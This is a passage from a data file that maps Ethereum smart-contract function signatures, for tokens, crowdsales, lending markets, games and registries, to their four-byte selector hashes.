"loggedAsStatement(uint256)": "0x93faf781", "put(string)": "0x4c21eb07", "assertInvalidState()": "0xd5f87242", "createTestingEnvironment()": "0x01b8a0b9", "challengeContract(address)": "0xc0309697", "BaseBountyContract(address)": "0xd71fcbe6", "getHash(bytes32,uint256)": "0x168e41e8", "setHash(bytes32,uint256,bytes32)": "0xf3cc6860", "setAllowCnsContract(bytes32,address,bytes32,bool)": "0xe9fd4e1f", "getIsRemoved(bytes32)": "0xe1c4a6a6", "create(bytes32,address,bytes32[3],bytes32,bytes32)": "0x8a87873a", "hashes(bytes32)": "0xd658d2e9", "allowCnsContracts(bytes32,address,bytes32)": "0x359531f4", "getFiltersLength()": "0xe48c09fe", "getFilter(uint256)": "0x2c92fb99", "setFilter(uint256,address)": "0xffacade4", "delFilter(uint256)": "0xc604e967", "setProviderClosed(uint256,uint256)": "0xc053ebf5", "getProviderClosed(uint256)": "0x678dd961", "setProviderLastSupplyID(uint256,uint256)": "0xb84e44ab", "getProviderLastSupplyID(uint256)": "0x42e9555e", "setProviderSupply(uint256,uint256)": "0x38132838", "getProviderSupply(uint256)": "0x5e25495e", "getProviderSupply(uint256,uint256)": "0x76f3264b", "setProviderInvitedUser(uint256,address,bool)": "0xd4313945", "getProviderInvitedUser(uint256,address)": "0xb368cb10", "setProviderClientsCount(uint256,uint256)": "0x85025396", "getProviderClientsCount(uint256)": "0x86703c9c", "setProviderPriv(uint256,bool)": "0xa7f36c2e", "getProviderPriv(uint256)": "0x1affa814", "setProviderCurrentRate(uint256,uint8)": "0x5655c490", "getProviderCurrentRate(uint256)": "0x6c3919fc", "setProviderRateHistory(uint256,uint256,uint8,bool)": "0x008e8135", "getProviderRateHistory(uint256,uint256)": "0xbad69502", "setProviderIsForRent(uint256,bool)": "0x598db132", "getProviderIsForRent(uint256)": "0x634d27c3", "setProviderInfo(uint256,string)": "0x1ac46290", "getProviderInfo(uint256)": "0x40015d99", "setProviderCountry(uint256,uint256)": "0x86ba793e", "getProviderCountry(uint256)": "0x334249a7", "setProviderWebsite(uint256,string)": "0xee1333a1", "getProviderWebsite(uint256)": "0x393f4605", "setProviderName(uint256,string)": "0xcdab9b5b", "getProviderName(uint256)": "0x0c5a97a6", "setProviderAdmin(uint256,address)": "0x8ea44bab", "getProviderAdmin(uint256)": "0x025b97bd", "setProviderOwner(uint256,address)": "0x41bc2bea", "getProviderOwner(uint256)": "0x1df1ec82", "setProviderSupply(uint256,uint256,uint256)": "0x3479101f", "getProviderRateHistory(uint256,uint256,uint8)": "0x4cfe4c69", "getProviderSupply(uint256,uint256,uint256)": "0x0439f7d4", "setProviderDetailFields(uint256,bool,bool,uint256)": "0xd8fa191b", "getProviderDetailFields(uint256)": "0x5d228eb0", "setProviderInfoFields(uint256,string,string,uint256,string,address,uint8)": "0x1c338601", "getProviderInfoFields(uint256)": "0x230b9667", "isProviderValid(uint256)": "0xdeb209f6", "checkForJoin(uint256,address,uint256)": "0x9366804f", "closeProvider(address)": "0xfad09ab3", "openProvider(address,bool,string,string,uint256,string,uint8,bool,address)": "0xf2e03ad0", "setSchellingRoundReward(uint256)": "0x39048f02", "setSchellingRoundSupply(uint256)": "0xf3ce40eb", "setSchellingRoundDetails(uint256,uint256,uint256)": "0x9f789a0c", "getSchellingRoundDetails(uint256)": "0xaef7ad9c", "getSchellingRoundDetails()": "0x4eb81ba4", "newSchellingRound(uint256,uint256)": "0x4fab2035", "setClientProviderUID(address,uint256)": "0x17adeb7c", "getClientProviderUID(address)": "0x63ae10fe", "setClientLastSupplyID(address,uint256)": "0x2791cb17", "getClientLastSupplyID(address)": "0x91423ef2", "setClientLastPaidRate(address,uint8)": "0x33a3e669", "getClientLastPaidRate(address)": "0xdcace702", "setClientPaidUpTo(address,uint256)": "0x2e293e58", "getClientPaidUpTo(address)": "0xa861f99a", "setClientSupply(address,uint256)": "0xdb5b5799", "getClientSupply(address,uint256)": "0x8f80269d", "getClientSupply(address)": "0x53b5015c", "setClientSupply(address,uint256,uint256)": "0x7d1bd3ea", "getClientSupply(address,uint256,uint256)": "0xf604498a", "getSenderStatus(address,uint256)": "0x4e400bda", "partFromProvider(uint256,address)": "0x94c1d810", "joinToProvider(uint256,address)": "0xdb25c328", "isClientPaidUp(address)": "0xa7eb891f", "getProviderCounter()": "0xd02dade4", "debug_changeOwner(address)": "0x11ddf693", "wipe(address,bytes32,uint256,address)": "0x8a9fc475", "draw(address,bytes32,uint256)": "0x0344a36f", "lock(address,bytes32)": "0xbc25a810", "give(address,bytes32,address)": "0xda93dfcf", "open(address)": "0xb95460f8", "SODCOIN()": "0xfdcf154c", "WowMusicDiamondToken(address)": "0xad506098", "EUROCASH()": "0x1c40baf5", "payLast(uint256)": "0x4f084c0c", "insertLastPlys(uint256)": "0x50428f84", "airdrop(uint256)": "0x97dc4a13", "updateMarriageLicenceImageIPFShash(string)": "0xb61a98cb", "updateCoupleImageIPFShash(string)": "0x899b3414", "DXN()": "0x3808ac11", "get_dati_articolo(bytes,bytes,bytes10)": "0xf39b7fb1", "get_dati_lotto(bytes)": "0xf676d539", "createLotto(bytes,bytes,bytes10,bytes10,bytes)": "0xbf6deda4", "get_articolo(bytes,bytes10)": "0x82fffde0", "addArticolo(bytes,bytes10,bytes10,bytes)": "0xaf0cfe1f", "HIDERA(uint256,string,string,uint256)": "0xa7e5a338", "HideraNetwork(uint256,string,string)": "0xfd1ccaf3", "IFCNBToken()": "0x0ff43cfd", "signalBackupWithdraw(address)": "0x95b8cf55", "transferBalanceWithFee(address,address,address,uint256,uint256,address)": "0x34814e58", "verifyWithdrawSignature(address,bytes)": "0xc043df8c", "deregisterBroker(address)": "0x490618d1", "registerBroker(address)": "0xc6842868", "updateBalancesContract(address)": "0xb8fd1e10", "joinFraction(uint256,uint256,int16)": "0x33492138", "isEthereumBased(address)": "0x12826f30", "getTokenDetails(uint64)": "0x01df6885", "subtractDarknodeFee(uint256)": "0xb538cefc", "isBuyOrder(bytes32)": "0xea75d311", "hashOrder(bytes,uint64,uint64,uint256,uint256,uint256)": "0xce0f92b7", "getMatchDetails(bytes32)": "0x4f54f4d8", "slash(bytes32)": "0xf415ed14", "updateSubmissionGasPriceLimit(uint256)": "0x675df16f", "verifyTokens(uint64,uint64)": "0x7220426f", "previousReturnValue()": "0xa7f5eccc", "safeTransferFromWithFees(address,address,address,uint256)": "0xedc19a81", "safeApprove(address,address,uint256)": "0xeb5625d9", "safeTransferFrom(address,address,address,uint256)": "0xd9fc4b61", "safeTransfer(address,address,uint256)": "0xd1660f99", "MYE()": "0x74e59296", "buyXnameQR(address)": "0xccc8b33c", "transferQueue(address[],uint256[])": "0x6b462936", "roll(uint256)": "0x1f7b4f30", "BONUSROLL()": "0x5512a353", "removeBlockListed(address)": "0x1b369fad", "addBlockListed(address)": "0x2e0dfafc", "grantReservedToken(address,uint256)": "0x0ee4229c", "removeBlockeddUser(address)": "0x16d4c77c", "addBlockeddUser(address)": "0x439b91c4", "ActiveAdmin()": "0x2211944a", "SGCL()": "0x7c2b00fc", "inviteHandler(bytes32)": "0x5039c62c", "PK(uint8,bytes32)": "0x24675116", "updateConfig(address)": "0x6cc919c8", "loseHandler(address,uint8)": "0x135fc676", "getInviteRate()": "0x6c03cd49", "getPumpRate()": "0xb42c6b4f", "getOverRate(uint8)": "0x235b1eb7", "getWinRate(uint8)": "0x472b6efa", "EXOSO()": "0x6d4045a8", "WIE()": "0x29f46429", "liquidateBorrow(address,address,address,uint256)": "0xe61604cf", "repayBorrow(address,uint256)": "0xabdb5ea8", "calculateAccountValues(address)": "0x9f180cf1", "calculateAccountValuesInternal(address)": "0xee3ec146", "calculateAccountLiquidity(address)": "0xbed9404f", "supply(address,uint256)": "0xf2b9fdb8", "_withdrawEquity(address,uint256)": "0x4706c375", "_setOriginationFee(uint256)": "0x24021127", "_setRiskParameters(uint256,uint256)": "0xc365a646", "_suspendMarket(address)": "0xdbe2bc84", "getBorrowBalance(address,address)": "0x118e31b7", "getSupplyBalance(address,address)": "0xba377731", "getAccountLiquidity(address)": "0x5ec88c79", "_setPaused(bool)": "0x26617c28", "_setOracle(address)": "0x3be59443", "_acceptAdmin()": "0xe9c714f2", "_setPendingAdmin(address)": "0xb71d1a0c", "fetchAssetPrice(address)": "0xddec280e", "calculateBorrowAmountWithFee(uint256)": "0xf30df155", "getPriceForAssetAmountMulCollatRatio(address,uint256)": "0xf0f8aff9", "getPriceForAssetAmount(address,uint256)": "0xed1d840d", "calculateBalance(uint256,uint256,uint256)": "0xe69e4640", "calculateInterestIndex(uint256,uint256,uint256,uint256)": "0xe06a09ec", "getCollateralMarketsLength()": "0x6e2ede03", "addCollateralMarket(address)": "0x65dc4e3a", "getExp(uint256,uint256)": "0xba9316b7", "doTransferOut(address,address,uint256)": "0xc66c2536", "getBalanceOf(address,address)": "0x53290b44", "getCash(address)": "0x607b463a", "doTransferIn(address,address,uint256)": "0xc37f7f7f", "checkTransferIn(address,address,uint256)": "0x0683dc58", "addThenSub(uint256,uint256,uint256)": "0x5f403edc", "getBorrowRate(address,uint256,uint256)": "0xed2b5a3c", "getSupplyRate(address,uint256,uint256)": "0x517cf73e", "assetPrices(address)": "0x5e9a523c", "debtor(address,uint256)": "0x95669952", "dealStatus(uint256)": "0x306387a4", "DCAssetBackend(bytes32,bytes32)": "0xd8915fc5", "DataService()": "0xcaed4f9f", "DAO(address,uint256,uint256,uint256,address)": "0x06961560", "current_spin_number()": "0x499af77c", "currentLeader()": "0xac4bd53a", "CurrentGame()": "0xb8aca90b", "currentFee()": "0xda3c300d", "currentDepositLimit()": "0x0295d71b", "currentCycle()": "0xbab2f552", "currentClaimPriceWei()": "0x85528394", "currentClaimPriceInFinney()": "0x80c951bf", "currentBalance()": "0xce845d1d", "CT()": "0xbfc3d84b", "CrystalDoubler()": "0xeccf1b29", "CryptoHill()": "0xe42def21", "Crowdsale(address,uint256,uint256)": "0xec5c9036", "CROWDFUNDING_PERIOD()": "0x26a4861c", "CrossWhitehatWithdraw(uint256,address)": "0x77863b61", "Create(uint32,address)": "0xe1c66292", "createTx(uint256,address,uint256)": "0x6f9a5eab", "createTradeContract(address,uint256,uint256,uint256,bool,bool)": "0x3d6a32bd", "CreateTicket(address,uint8,uint8,uint8)": "0x72479140", "createThings(bytes32[],uint16[],bytes32[],uint16[],uint88)": "0x8ea822d8", "createThing(bytes32[],bytes32[],uint88)": "0x16d960b5", "createSwap(uint256)": "0x4156fdb7", "createSchema(bytes)": "0x35cc59a9", "CreateProposal(string,string,string,string,string,string,uint32,uint32)": "0xa753d6f2", "CreateProposal(string,string,string,uint32,string,string,string,uint32,uint32)": "0xa21931ea", "createKingdom(string,address,address,address,address)": "0xeac116c4", "createKingdom(string,address,address,address)": "0xc88961da", "createHKG(address)": "0x5fe27ab0", "CreateHash(uint8,string)": "0xe9794dc1", "createDocument(uint256)": "0xf463edd1", "createDebt(address,address,uint256)": "0x0eb0afa6", "createCoin(string,uint256,uint256,string,string,address)": "0x66e98c31", "create(address,address,address,uint256,uint8,uint8,uint256)": "0x4a82534b", "CrazyEarning()": "0xe10e274a", "countVotes(uint256)": "0x1840f0ca", "CounterPartyDeposit()": "0x135128c2", "countByOwner(address)": "0x061ea8cc", "copy()": "0x60726abb", "copypaste()": "0x276b94e1", "convertToWei(uint256,string)": "0x90f2c86d", "convertTo(uint256,string,string)": "0x3733ffca", "convertToInt(string)": "0xbed1b8b9", "convertToEach(uint256,string,uint256)": "0x5020dcf4", "convertToAllTable(uint256,string)": "0x11cd98ed", "ConvertNumbers(bytes5)": "0xc618d15f", "convertGreyGreen(uint8,uint8)": "0x1aadcc34", "contribute_toTheGame()": "0x7e7a2fbf", "ContractPlay()": "0x1747dfd4", "contains()": "0xda4b5e29", "contains(address)": "0x5dbe47e8", "contains(int256,address)": "0x0afa9fb9", "confirmReverse(string)": "0x3f3935d1", "confirmAndCheck(bytes32)": "0x0ae08793", "_confirmAndCheck(bytes32)": "0xffb4c857", "_confirmAndCheck(address,bytes32)": "0x4746cef8", "configure(uint256,uint8,uint256,uint256,uint256,uint256)": "0x47f3d794", "ConfigureFunction(address,uint256,uint16,uint16,uint16)": "0x3773930e", "configure(address,address,uint256,uint8,bytes32,bytes32)": "0x305b73d9", "configure(address)": "0x75cb2672", "Config(uint8,address)": "0xc8f8d75d", "concat(string,string)": "0x89c19ddb", "concat()": "0x6bdbf8e6", "computeResultVoteExtraInvestFeesRate()": "0x5aa94a68", "computeNameFuzzyHash(string)": "0xbfbc793c", "compensateLatestMonarch(uint256)": "0x4f139314", "compare(string,string)": "0x3a96fdd7", "compare()": "0x3da0ac79", "commit(uint256,bytes32)": "0xf2f03877", "commitReading(address,uint256,uint256,string)": "0xbe4054b9", "commitReading(address)": "0x355474d2", "commitmentCampaign(uint256,bytes32)": "0xf3bb9741", "commit(bytes32)": "0xf14fcbc8", "comm_channel()": "0xd9fcb31f", "collectRev()": "0x4a71d469", "CollectMoney(uint256)": "0xeeb57139", "collectFees(uint256)": "0xb17acdcd", "collectFee()": "0xd4d5d32a", "collectEarnings()": "0xc27b2c2d", "CollectAndReduceFees(uint256)": "0xaf8b7525", "CollectAllFees()": "0x7879e19e", "Coinflip()": "0x203c03fa", "closeRequest()": "0xc71b583b", "closeFunding()": "0x31a3a506", "closeBooks()": "0xee1b4828", "_closeBooks()": "0x01775f23", "clawback()": "0x2526d960", "classicTransfer(address)": "0x565a2ecf", "ClassicCheck()": "0x4e05ded6", "claim_victory(uint256,uint8,uint8,uint8)": "0x4a1aa767", "claim_time_victory(uint256)": "0xe6e7237f", "claimThroneRP(string)": "0x3b751f7f", "claimReward()": "0xb88a802f", "claimDonations(uint256)": "0x0b3ed536", "claimDividendShare(uint256)": "0x008a745d", "claim(bytes32)": "0xbd66528a", "updateRegistration(string,string)": "0x71e11354", "updateReading(uint256)": "0x9dc35799", "updateReading(uint256,uint256)": "0x482961e1", "UpdatePrice(uint8,uint32)": "0xb3485dca", "updateMintingData(uint256,uint256)": "0x10f41715", "updateMinEthPerNotification(uint256)": "0xf2016a4f", "updateInvestmentTotal(address,uint256)": "0x7c582304", "updateGoldFeeData(uint256)": "0x4f10acc1", "updateGasForXaurData(uint256,uint256)": "0x2ffb9e64", "updateDefaultTimeoutPeriod(uint256)": "0xb4a5ef58", "updateBOTBillingInfo(uint256,string,address,string,string,uint256)": "0xfd8055d2", "updateBalance(address,uint256)": "0xe0b1cccb", "unvault(uint256)": "0x0e38901a", "untrustedChildWithdraw()": "0x6a4b6aa5", "untrustClient(address)": "0x63def590", "until()": "0x9447fd0a", "_unsafeSend(address,uint256)": "0xf295206f", "unregisterListening(address)": "0xf1a00a53", "unRegisterCertificationDb(address)": "0x4e116eb8", "unregister(bytes32)": "0x1a0919dc", "unregister(address)": "0x2ec2c246", "UniversalFunction(uint8,bytes32,bytes32,bytes32,bytes32,bytes32)": "0x579badf6", "UniversalFunctionSecure(uint8,bytes32,bytes32,bytes32,bytes32,bytes32)": "0xd4859dbc", "unhint(int256,bytes32)": "0xff81fb91", "unhalt()": "0xcb3e64fd", "underdogPayoutMarkup()": "0x2880ebe7", "underdogPayoutFund()": "0x75f40f40", "underdogInfo(uint256)": "0x6eb7b4c2", "underdogCount()": "0xf0d474f9", "unclaimedFees()": "0x734d8287", "uncertify(address)": "0x9e1e6528", "uint2str(uint256)": "0xf76f950e", "UfoPonzi()": "0x4dd850fb", "twoYearsPassed()": "0x49cc954b", "TwoAndAHalfPonzi()": "0x0d0c2008", "two()": "0x5fdf05d7", "TrustEth()": "0x65343fcb", "trusteeWithdraw()": "0x2e6e504a", "trustedChildWithdraw()": "0x866f6736", "trustedChildRefund()": "0x464f37c9", "trustClient(address)": "0x432c685f", "triple()": "0x54204ad4", "Triger()": "0x8fe58eb9", "Trash(uint256)": "0xe99543aa", "_transferWithReward(address,address,uint256)": "0x1d065dde", "transferWithReference(address,uint256,string)": "0xac35caee", "_transferWithReference(address,uint256,string)": "0x51b3d7b9", "__transferWithReference(address,uint256,string)": "0x6d16f79c", "transferViaProxy(address,address,uint256)": "0x240ecad5", "transfer(uint256)": "0x12514bba", "transfer_token(address,address,uint256)": "0xe7dafdb6", "transferToICAPWithReference(bytes32,uint256,string)": "0x77fe38a4", "_transferToICAPWithReference(bytes32,uint256,string)": "0x078c3fa4", "__transferToICAPWithReference(bytes32,uint256,string)": "0x3bf2313d", "transferToICAP(bytes32,uint256)": "0x733480b7", "_transferToICAP(bytes32,uint256)": "0xa25057de", "transferTLA(string,address)": "0xd3aa22c7", "transfer(string,address)": "0xfbf58b3e", "transferringETH(address)": "0xd4245e5b", "transferringETC(address)": "0x1301ee02", "transferOtherFrom(address,address,address,uint256)": "0x67af26fb", "transferOther(address,address,uint256)": "0x235c002d", "transferOperator(address)": "0x29605e77", "transferIfPuritanical(address)": "0xd6a619e3", "transferIfHardForked(address)": "0x752a3df6", "transferFromWithReference(address,address,uint256,string)": "0x6461fe39", "_transferFromWithReference(address,address,uint256,string)": "0xa10bee85", "__transferFromWithReference(address,address,uint256,string)": "0x3de9e4c6", "transferFromWithReference(address,address,uint256,bytes32,string)": "0x31c6c4cf", "transferFromViaProxy(address,address,address,uint256)": "0xcacc24eb", "transferFromTreasury(address,uint256)": "0x48a490fb", "transferFromToICAPWithReference(address,bytes32,uint256,string)": "0xa48a663c", "_transferFromToICAPWithReference(address,bytes32,uint256,string)": "0x0b1e400a", "__transferFromToICAPWithReference(address,bytes32,uint256,string)": "0xcac77df7", "transferFromToICAP(address,bytes32,uint256)": "0xa525f42c", "_transferFromToICAP(address,bytes32,uint256)": "0xc204f9f1", "_transferFrom(address,address,uint256)": "0xcb712535", "_transferFee(address,uint256,string)": "0xa0eda9f2", "transfer_eth(address,uint256)": "0x97fcb54e", "transferETH(address)": "0xd50f6bf0", "transferETC(address)": "0x63334c58", "_transfer(address,address,uint256)": "0x30e0789e", "transferDirector(address)": "0xddd41ef6", "transferDebt(address,address,address,uint256)": "0x60063887", "transferBounty()": "0x22e803c2", "transfer_asset(address,uint256)": "0xdeb80111", "transfer(address,uint256,bytes32)": "0x57cfeeee", "_transfer(address,uint256)": "0x4847a79c", "TradeFinancing()": "0x04bb754c", "trade(address,uint256,address,uint256)": "0xbb39a960", "totBOTs()": "0x637e86eb", "totalWeiPrice()": "0x8caaaae6", "totalUsers()": "0xbff1f9e1", "totalSupply(bytes32)": "0xb524abcf", "totalRescues()": "0x6a8c2437", "totalPayedOut()": "0x6831c169", "Total_of_Players()": "0xdc19266f", "totalInvested()": "0x5216aeec", "totalEntries()": "0x7fef036e", "totalDebt(address)": "0x1ff517ff", "PublishWorldCupResults(bytes32,bytes32,bytes32,bytes12)": "0x999cef04", "CloseForecasting(uint16)": "0x6186fe71", "UpdateForecast(bytes32,bytes32,bytes32,bytes12)": "0x43cd2c40", "PlaceNewForecast(bytes32,bytes32,bytes32,bytes12)": "0xed7dd693", "AviciiCoin()": "0x81290a80", "BitcoinExchange()": "0xa02853ef", "IPchainStandardToken(uint256,string,uint8,string)": "0xc1b43af8", "RetengoToken()": "0x394b0ba9", "isWitness(address,address)": "0x4c174ef0", "signWitness()": "0x001ba7ea", "signContract()": "0xb8b4f1a0", "married()": "0x9214b644", "getAgreement()": "0xbca60cf5", "getTill()": "0x35d9ba1f", "getB()": "0xa1c51915", "getA()": "0xd46300fd", "MarriageContract(address,address,uint256,string)": "0x6aedc282", "EthereumOneToken(string,uint8,string)": "0xc9c347b9", "IGTUSD()": "0x0c91af81", "toggleTransferFor(address)": "0x17d28620", "toggleTransfer()": "0x4ab798f1", "setContractAdmin(address,bool)": "0xf4acc2ed", "setContractToken(address,address)": "0x822221a6", "BatchTransfer(address)": "0x5f2bb66e", "NEKOCOIN()": "0xdc31e06c", "DiamondCash()": "0xdd03447f", "matches(string)": "0x32ac752b", "s43(bytes1)": "0x0ba4d242", "s42(bytes1)": "0xfbd06cb6", "s41(bytes1)": "0x8b6497b9", "s40(bytes1)": "0xaefe9ca0", "s39(bytes1)": "0x6ae9eea8", "s38(bytes1)": "0xe72f4f2a", "s37(bytes1)": "0xf716fe43", "s36(bytes1)": "0xcc95d8d1", "s35(bytes1)": "0x287b8862", "s34(bytes1)": "0xaa05b852", "s33(bytes1)": "0xd6c1869b", "s32(bytes1)": "0x89805f30", "s31(bytes1)": "0xf8ddd288", "s30(bytes1)": "0x08c36eb0", "s29(bytes1)": "0x2bcbdf7f", "s28(bytes1)": "0x3dbb07ac", "s27(bytes1)": "0x755d766c", "s26(bytes1)": "0x12cf85c8", "s25(bytes1)": "0x687711ec", "s24(bytes1)": "0x20bfde8b", "s23(bytes1)": "0xd17e45fb", "s22(bytes1)": "0x23d1fe56", "s21(bytes1)": "0xc5e3e3f3", "s20(bytes1)": "0x04a373cc", "s19(bytes1)": "0xde5866f9", "s18(bytes1)": "0xa10c44fb", "s17(bytes1)": "0xfbdd3982", "s16(bytes1)": "0x9566880b", "s15(bytes1)": "0xb9e6edcf", "s14(bytes1)": "0xd0fa968a", "s13(bytes1)": "0xb9212662", "s12(bytes1)": "0x03c5faf4", "s11(bytes1)": "0x19806d8e", "s10(bytes1)": "0xdb264a36", "s9(bytes1)": "0x7cb8adc7", "s8(bytes1)": "0x6d23c516", "s7(bytes1)": "0x331a72bb", "s6(bytes1)": "0x3942a979", "s5(bytes1)": "0xc3aebdd1", "s4(bytes1)": "0x5c5f786e", "s3(bytes1)": "0xad01ed4c", "s2(bytes1)": "0x6c876e5d", "s1(bytes1)": "0xfb0f6f42", "s0(bytes1)": "0xf20d5943", "setPercentages(uint8,uint8,uint8,uint8,uint8,uint8)": "0x3e77dcfb", "setStepLimits(uint256,uint256)": "0xff630748", "setOwnerCut(uint256)": "0x757de573", "EthernautsMarket(uint256)": "0x753b8c02", "withdrawBalances(address)": "0xca64a02d", "setEthernautsStorageContract(address)": "0x4b3afdd2", "EthernautsLogic()": "0x5332510b", "isExploring(uint256)": "0xc86dca5a", "getTokenList(address,uint8,uint256,uint256)": "0x6cdfcc6e", "isState(uint256,uint8)": "0xef816fd9", "isCategory(uint256,uint8)": "0x66025047", "hasAnyAttrs(uint256,bytes2)": "0xcdde76f7", "hasAllAttrs(uint256,bytes2)": "0x9e23602e", "getStats(uint256)": "0x7b303965", "setAssetCooldown(uint256,uint256,uint64)": "0x058d4dd0", "updateState(uint256,uint8)": "0xffbafdfe", "approve(uint256,address)": "0xfebe4909", "EthernautsStorage()": "0x0eb40916", "setCTO(address)": "0xfe1439b4", "SGEToken()": "0xf56eba15", "Test20()": "0x689a4608", "unFreeze(uint8)": "0x492d06cf", "freeze(address,uint256,uint8)": "0xf524613f", "transferMulti(address[],uint256[])": "0x35bce6e4", "Token(uint256,string,uint8,string,bool)": "0x598f512b", "TokenFactoryImpl(address)": "0xc7e4f453", "FEELCOIN()": "0xbd5d7b1d", "getLostAndFoundMaster()": "0x704d4ab1", "getMatchInfo()": "0x063c67c2", "yearlyOwnerTokenWithdrawal()": "0x71f4f65e", "TOTAL_PREALLOCATION()": "0x2bc402fa", "smxSold()": "0xa5fa2490", "bonusDicrement()": "0x4e89eb98", "lastBlockRewarded()": "0xeadf1f39", "shareholdersHolding1y()": "0xd7815ba4", "tokensBought()": "0x732783ac", "getRestSumStageICO()": "0x271781ad", "PHASE1_START_TIME()": "0x0e4d5919", "AIRDROPPER()": "0x368a5e34", "multiSigWallet()": "0x4b8feb4f", "usdAmount()": "0xf0d90937", "foundersTimelock()": "0x64ceed99", "wanToken()": "0x847e27d9", "isBidFinal()": "0xee7c1786", "loanTerm()": "0x3577d94e", "ecoFundSupply()": "0xac4a743d", "level_1_amount()": "0xe1a69d88", "athleteAlreadyClaimed()": "0x63dcfa9e", "perPrice()": "0x746d3024", "PUBLIC_START_TIME()": "0x297c4143", "gasPriceForOraclize()": "0x1708f617", "isCompositionOnlyWithBaseLayers()": "0xb9e3a8dd", "h_pwd()": "0x2ad9527e", "amountFundBounty()": "0x2afed67e", "daoCreator()": "0x149acf9a", "soulsForSale()": "0x146e7eea", "icoSoldCap()": "0xf746f365", "totalAlloc()": "0xbdfaa337", "partnerSaleTokensAvailable()": "0xb2b02109", "TOTAL_T8EXTOKEN_SUPPLY()": "0x4f466ce6", "winner_percentage()": "0xbe408a5f", "advisorTokens()": "0x363221fe", "DUNGEON_CREATION_LIMIT()": "0x95e4d456", "redeemWallet()": "0xb06f8d34", "stage_1_tokens_scaled()": "0xd922b6ab", "blackFridayEndBlock()": "0x4c53adb0", "SUFFICIENT_STATUS()": "0x1d15f317", "MAX_ETHER()": "0x315ccd21", "totalIssuanceData()": "0x09c1a4b9", "prizeWithdrawal()": "0x8c794114", "nextNumberOfWagersToFinalTimeout()": "0x14d72106", "allowTransferTimestamp()": "0xb3db410c", "newTokens()": "0x87b4e60a", "vraWallet()": "0xbbb50b78", "KWHForGas()": "0x04950f45", "iceFundDeposit()": "0x73cc3ec7", "getTimeUntilStart()": "0x6766d1ba", "coauthor()": "0x2bddc31c", "adviserSold()": "0xcb656a13", "tokenPerWei()": "0x356f9865", "mainSale_TokenCap()": "0x213671bf", "percent()": "0x70ba1113", "consumerAddress()": "0xdbc2d042", "tournamentOwnersCut()": "0xb3a810f7", "feeAmount()": "0x69e15404", "TRSOffset()": "0x904de64e", "TOTAL_TOKEN_CAP()": "0x6f5d712e", "num_hosts_revealed()": "0x0b1f3850", "SFT_PER_ETH_BASE_RATE()": "0x6835df3e", "saleTokensAddress()": "0xafa31744", "inviteAmountLimit()": "0x4acea254", "STAKE_START_TIME()": "0x1129f644", "limitedPrinter()": "0x42569ff3", "minBuyingAmount()": "0x94062a9d", "stage2()": "0xa1fcc3bc", "MaxPoSXblock()": "0x5ff65efe", "developerAccount()": "0xf6ec91d5", "purseExchange()": "0xa5a2aa33", "mergedMinerValidatorAddress()": "0xe6957514", "giveEthxAddress()": "0x8e007cfa", "staff_3()": "0xccd385f5", "leaderboardDataContract()": "0xb285643e", "intervalDuration()": "0x3076dc42", "INCENT_FUND_VESTING()": "0x52efd35f", "investorWallet()": "0x643aff0f", "bountyMktWallet()": "0xaa72f217", "CindicatorIssued()": "0xefc65b3a", "THAW_CYCLE_FUNDER()": "0x66494ab6", "PreSaleStartTime()": "0x4f2eebc3", "totalDETsSold()": "0x518b7a29", "extra_bonus_duration()": "0x91828a2e", "roundStartedTimestamp()": "0x47e7bce6", "safeContract()": "0xf9081ba2", "chainStartBlockNumber()": "0xcd474b04", "getICOLength()": "0x51b2270f", "authorizedCount()": "0x13270bb8", "PartnersFund()": "0x3d9e23ca", "govtAccount()": "0x6d9cb37d", "secondWeekBonus()": "0x973fe7ef", "rechallengePossible()": "0x24642510", "isEggFactory()": "0x99d1c413", "partner2_address()": "0x9e5f1889", "CandyRate()": "0xf1c7689e", "AIRDROPS_PERIOD()": "0x88efedf4", "rateLoss()": "0xd5e99dac", "VULCAN_POD_EXTRACTION_BASE()": "0x4a5baa1b", "creatorPaid()": "0xa210c6a9", "softCapClose()": "0xad1be7c1", "advisor3Sum()": "0x522dd549", "buyKissBTCWithCallback(address,uint256)": "0x854f4817", "buyKissBTC()": "0xd24ddcfe", "buyinInternal(address,uint256)": "0x4ea66c38", "buyin(address,uint256)": "0x29cbdc86", "buyer_pay()": "0xd04bfc9c", "buyer_cancel()": "0xe7e2aa0e", "buyBuilding(uint256,uint256)": "0xe75528cc", "buyBOTx(uint256,string,string,address,uint256)": "0x29274fe1", "buyBankerAgreementFromImporterBank()": "0x5f8f0483", "buyAd(string,string,string,uint256,uint8,address)": "0x561a4873", "buy100DaoFor1Eth()": "0x3824d8ee", "burnUnsoldCoins(address)": "0x5fc5d48b", "burnCoins(address)": "0xdad99989", "buildCity(string,uint256[2],uint256[2])": "0xb0ad38c4", "bribery()": "0x0ad95b44", "BranchSender(uint256,bytes32)": "0x4cb85356", "botOnSale(uint256,uint256)": "0x60913244", "Bookie(address,address)": "0xdba7ef7d", "bookEarnings(address,uint256)": "0x9eee85fe", "bookEarnings()": "0xbb00fc55", "BookCafe()": "0xd1100691", "board(uint256,uint8,uint8)": "0x00601d6c", "blockTransfer(address,uint256)": "0x48d9a374", "BlocksureInfo()": "0x9ad4f98e", "BlockChainEnterprise()": "0x8a519fb9", "BlockChainChallenge()": "0xf67a1d37", "BigRisk()": "0x71dd99fe", "Big()": "0x934db458", "beyond()": "0x416c8701", "bet_this_spin()": "0x3adb2de7", "BetOnHashV84()": "0x86314af9", "betOnColumnOrDozen(bool,bool,bool)": "0xd30a512e", "betOnATeam(uint256)": "0xf79b22e0", "BeerCoin(uint256)": "0x738486bd", "bbb()": "0xd767aee0", "BasicCoin(uint256,address)": "0xcbe9ef39", "BaseRegistry()": "0xb5deeca7", "ban(address)": "0x97c3ccd8", "Ballot(uint8)": "0x940f851c", "Ballot(bytes32[])": "0x61a00f6d", "balanceOf(address,bytes32)": "0x4d30b6be", "BalancedPonzi()": "0x0a6be0e7", "bal()": "0x3d79d1c8", "awaitingPayout()": "0x10cf5d47", "Auth(uint8,address)": "0x2db89533", "authorizeAddress(address)": "0x4a5db3b5", "authCancel(address)": "0x39b35753", "authCall(address,bytes32)": "0x373c98a2", "at(uint256)": "0xe0886f90", "attack(uint256,uint256,uint256[])": "0xa843c97f", "asyncSend(address,uint256)": "0x7fe0518a", "assignFreeReadings(address,uint8)": "0x0399c357", "assetMoveInformation(address,address)": "0x8a3e44d4", "askForEther(uint256)": "0xdba21657", "ARK_VOTER_1_00(uint256,uint256,uint256,uint256,uint256,uint256)": "0x97709cde", "ARK_TROGLOg_1_00()": "0xae30d35d", "ARKTagger_1_00()": "0x2be6d43c", "ARK_FLAGGER_1_00()": "0xfb32f4f5", "ARKController_1_00()": "0x014e5fde", "ARK()": "0x99154b49", 